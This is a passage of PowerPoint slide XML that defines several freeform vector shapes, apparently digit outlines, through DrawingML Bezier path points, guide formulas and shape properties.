                    <a:pt x="40" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="212"/>
                    <a:pt x="39" y="203"/>
                    <a:pt x="39" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="169"/>
                    <a:pt x="69" y="144"/>
                    <a:pt x="107" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="144"/>
                    <a:pt x="174" y="177"/>
                    <a:pt x="174" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="257"/>
                    <a:pt x="141" y="286"/>
                    <a:pt x="105" y="2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34" name="Freeform 875">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972B33FB-1894-4232-AD94-07815E2277FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId51"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4518026" y="1897063"/>
              <a:ext cx="74613" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 62 w 217"/>
                <a:gd name="T3" fmla="*/ 295 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 32 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 3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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="130"/>
                    <a:pt x="62" y="240"/>
                    <a:pt x="62" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="302"/>
                    <a:pt x="62" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="318"/>
                    <a:pt x="97" y="313"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="156"/>
                    <a:pt x="176" y="70"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166" y="3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35" name="Freeform 876">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A95A8062-32A5-4AF9-8CF3-81C69D345AEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId52"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4610101" y="1897063"/>
              <a:ext cx="71438" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 208"/>
                <a:gd name="T1" fmla="*/ 142 h 316"/>
                <a:gd name="T2" fmla="*/ 133 w 208"/>
                <a:gd name="T3" fmla="*/ 31 h 316"/>
                <a:gd name="T4" fmla="*/ 160 w 208"/>
                <a:gd name="T5" fmla="*/ 39 h 316"/>
                <a:gd name="T6" fmla="*/ 155 w 208"/>
                <a:gd name="T7" fmla="*/ 53 h 316"/>
                <a:gd name="T8" fmla="*/ 177 w 208"/>
                <a:gd name="T9" fmla="*/ 75 h 316"/>
                <a:gd name="T10" fmla="*/ 200 w 208"/>
                <a:gd name="T11" fmla="*/ 52 h 316"/>
                <a:gd name="T12" fmla="*/ 133 w 208"/>
                <a:gd name="T13" fmla="*/ 0 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 208"/>
                <a:gd name="T15" fmla="*/ 161 h 316"/>
                <a:gd name="T16" fmla="*/ 105 w 208"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 208 w 208"/>
                <a:gd name="T19" fmla="*/ 214 h 316"/>
                <a:gd name="T20" fmla="*/ 109 w 208"/>
                <a:gd name="T21" fmla="*/ 113 h 316"/>
                <a:gd name="T22" fmla="*/ 35 w 208"/>
                <a:gd name="T23" fmla="*/ 142 h 316"/>
                <a:gd name="T24" fmla="*/ 105 w 208"/>
                <a:gd name="T25" fmla="*/ 286 h 316"/>
                <a:gd name="T26" fmla="*/ 43 w 208"/>
                <a:gd name="T27" fmla="*/ 231 h 316"/>
                <a:gd name="T28" fmla="*/ 40 w 208"/>
                <a:gd name="T29" fmla="*/ 222 h 316"/>
                <a:gd name="T30" fmla="*/ 40 w 208"/>
                <a:gd name="T31" fmla="*/ 220 h 316"/>
                <a:gd name="T32" fmla="*/ 40 w 208"/>
                <a:gd name="T33" fmla="*/ 215 h 316"/>
                <a:gd name="T34" fmla="*/ 39 w 208"/>
                <a:gd name="T35" fmla="*/ 200 h 316"/>
                <a:gd name="T36" fmla="*/ 107 w 208"/>
                <a:gd name="T37" fmla="*/ 144 h 316"/>
                <a:gd name="T38" fmla="*/ 174 w 208"/>
                <a:gd name="T39" fmla="*/ 214 h 316"/>
                <a:gd name="T40" fmla="*/ 105 w 208"/>
                <a:gd name="T41" fmla="*/ 28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8" h="316">
                  <a:moveTo>
                    <a:pt x="35" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="89" y="31"/>
                    <a:pt x="133" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="31"/>
                    <a:pt x="158" y="36"/>
                    <a:pt x="160" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="41"/>
                    <a:pt x="155" y="44"/>
                    <a:pt x="155" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="65"/>
                    <a:pt x="164" y="75"/>
                    <a:pt x="177" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="75"/>
                    <a:pt x="200" y="67"/>
                    <a:pt x="200" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="27"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="133" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="0"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="55" y="316"/>
                    <a:pt x="105" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="316"/>
                    <a:pt x="208" y="274"/>
                    <a:pt x="208" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="157"/>
                    <a:pt x="164" y="113"/>
                    <a:pt x="109" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="113"/>
                    <a:pt x="57" y="122"/>
                    <a:pt x="35" y="142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="286"/>
                    <a:pt x="53" y="261"/>
                    <a:pt x="43" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="228"/>
                    <a:pt x="41" y="225"/>
                    <a:pt x="40" y="222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="40" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="212"/>
                    <a:pt x="39" y="203"/>
                    <a:pt x="39" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="169"/>
                    <a:pt x="69" y="144"/>
                    <a:pt x="107" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="144"/>
                    <a:pt x="174" y="177"/>
                    <a:pt x="174" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="257"/>
                    <a:pt x="141" y="286"/>
                    <a:pt x="105" y="2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36" name="Freeform 877">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A71CF3-D4B8-4E18-8E49-500129D9E562}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId53"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4695826" y="1897063"/>
              <a:ext cx="80963" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 311"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 311"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 311"/>
                <a:gd name="T6" fmla="*/ 146 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 311"/>
                <a:gd name="T8" fmla="*/ 146 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 311"/>
                <a:gd name="T10" fmla="*/ 115 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 311"/>
                <a:gd name="T12" fmla="*/ 95 w 232"/>
                <a:gd name="T13" fmla="*/ 296 h 311"/>
                <a:gd name="T14" fmla="*/ 115 w 232"/>
                <a:gd name="T15" fmla="*/ 311 h 311"/>
                <a:gd name="T16" fmla="*/ 205 w 232"/>
                <a:gd name="T17" fmla="*/ 311 h 311"/>
                <a:gd name="T18" fmla="*/ 225 w 232"/>
                <a:gd name="T19" fmla="*/ 296 h 311"/>
                <a:gd name="T20" fmla="*/ 205 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 311"/>
                <a:gd name="T22" fmla="*/ 174 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 311"/>
                <a:gd name="T24" fmla="*/ 174 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 311"/>
                <a:gd name="T26" fmla="*/ 213 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 311"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 311"/>
                <a:gd name="T30" fmla="*/ 213 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 311"/>
                <a:gd name="T32" fmla="*/ 174 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 311"/>
                <a:gd name="T34" fmla="*/ 174 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 311"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 311"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 311"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 311"/>
                <a:gd name="T42" fmla="*/ 5 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 311"/>
                <a:gd name="T44" fmla="*/ 35 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 311"/>
                <a:gd name="T46" fmla="*/ 146 w 232"/>
                <a:gd name="T47" fmla="*/ 22 h 311"/>
                <a:gd name="T48" fmla="*/ 146 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 311"/>
                <a:gd name="T50" fmla="*/ 35 w 232"/>
                <a:gd name="T51" fmla="*/ 19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2" h="311">
                  <a:moveTo>
                    <a:pt x="5" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="5" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="311"/>
                    <a:pt x="107" y="311"/>
                    <a:pt x="115" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="205" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="311"/>
                    <a:pt x="225" y="311"/>
                    <a:pt x="225" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="280"/>
                    <a:pt x="213" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="221" y="196"/>
                    <a:pt x="213" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="125" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="196"/>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37" name="Freeform 878">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6668CC73-A6CA-4A69-9737-1E65B351F72E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId54"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4789488" y="1897063"/>
              <a:ext cx="74613" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 81 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 81 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 69 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 286 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T37" fmla="*/ 28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8" h="316">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="131"/>
                    <a:pt x="42" y="109"/>
                    <a:pt x="42" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="55"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="109"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="109"/>
                    <a:pt x="30" y="134"/>
                    <a:pt x="69" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="47" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="286"/>
                    <a:pt x="35" y="258"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="63" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="150" y="286"/>
                    <a:pt x="109" y="2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38" name="Freeform 879">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31C2DB8-F929-4D12-A8F8-ABC6C9215C71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId55"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4876801" y="1897063"/>
              <a:ext cx="80963" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 233"/>
                <a:gd name="T1" fmla="*/ 189 h 311"/>
                <a:gd name="T2" fmla="*/ 0 w 233"/>
                <a:gd name="T3" fmla="*/ 206 h 311"/>
                <a:gd name="T4" fmla="*/ 20 w 233"/>
                <a:gd name="T5" fmla="*/ 226 h 311"/>
                <a:gd name="T6" fmla="*/ 146 w 233"/>
                <a:gd name="T7" fmla="*/ 226 h 311"/>
                <a:gd name="T8" fmla="*/ 146 w 233"/>
                <a:gd name="T9" fmla="*/ 280 h 311"/>
                <a:gd name="T10" fmla="*/ 115 w 233"/>
                <a:gd name="T11" fmla="*/ 280 h 311"/>
                <a:gd name="T12" fmla="*/ 95 w 233"/>
                <a:gd name="T13" fmla="*/ 296 h 311"/>
                <a:gd name="T14" fmla="*/ 115 w 233"/>
                <a:gd name="T15" fmla="*/ 311 h 311"/>
                <a:gd name="T16" fmla="*/ 205 w 233"/>
                <a:gd name="T17" fmla="*/ 311 h 311"/>
                <a:gd name="T18" fmla="*/ 225 w 233"/>
                <a:gd name="T19" fmla="*/ 296 h 311"/>
                <a:gd name="T20" fmla="*/ 205 w 233"/>
                <a:gd name="T21" fmla="*/ 280 h 311"/>
                <a:gd name="T22" fmla="*/ 174 w 233"/>
                <a:gd name="T23" fmla="*/ 280 h 311"/>
                <a:gd name="T24" fmla="*/ 174 w 233"/>
                <a:gd name="T25" fmla="*/ 226 h 311"/>
                <a:gd name="T26" fmla="*/ 213 w 233"/>
                <a:gd name="T27" fmla="*/ 226 h 311"/>
                <a:gd name="T28" fmla="*/ 233 w 233"/>
                <a:gd name="T29" fmla="*/ 211 h 311"/>
                <a:gd name="T30" fmla="*/ 213 w 233"/>
                <a:gd name="T31" fmla="*/ 196 h 311"/>
                <a:gd name="T32" fmla="*/ 174 w 233"/>
                <a:gd name="T33" fmla="*/ 196 h 311"/>
                <a:gd name="T34" fmla="*/ 174 w 233"/>
                <a:gd name="T35" fmla="*/ 20 h 311"/>
                <a:gd name="T36" fmla="*/ 153 w 233"/>
                <a:gd name="T37" fmla="*/ 0 h 311"/>
                <a:gd name="T38" fmla="*/ 139 w 233"/>
                <a:gd name="T39" fmla="*/ 0 h 311"/>
                <a:gd name="T40" fmla="*/ 118 w 233"/>
                <a:gd name="T41" fmla="*/ 10 h 311"/>
                <a:gd name="T42" fmla="*/ 5 w 233"/>
                <a:gd name="T43" fmla="*/ 189 h 311"/>
                <a:gd name="T44" fmla="*/ 35 w 233"/>
                <a:gd name="T45" fmla="*/ 196 h 311"/>
                <a:gd name="T46" fmla="*/ 146 w 233"/>
                <a:gd name="T47" fmla="*/ 22 h 311"/>
                <a:gd name="T48" fmla="*/ 146 w 233"/>
                <a:gd name="T49" fmla="*/ 196 h 311"/>
                <a:gd name="T50" fmla="*/ 35 w 233"/>
                <a:gd name="T51" fmla="*/ 19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3" h="311">
                  <a:moveTo>
                    <a:pt x="5" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="5" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="311"/>
                    <a:pt x="107" y="311"/>
                    <a:pt x="115" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="205" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="311"/>
                    <a:pt x="225" y="311"/>
                    <a:pt x="225" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="280"/>
                    <a:pt x="213" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="233" y="226"/>
                    <a:pt x="233" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="196"/>
                    <a:pt x="221" y="196"/>
                    <a:pt x="213" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="125" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
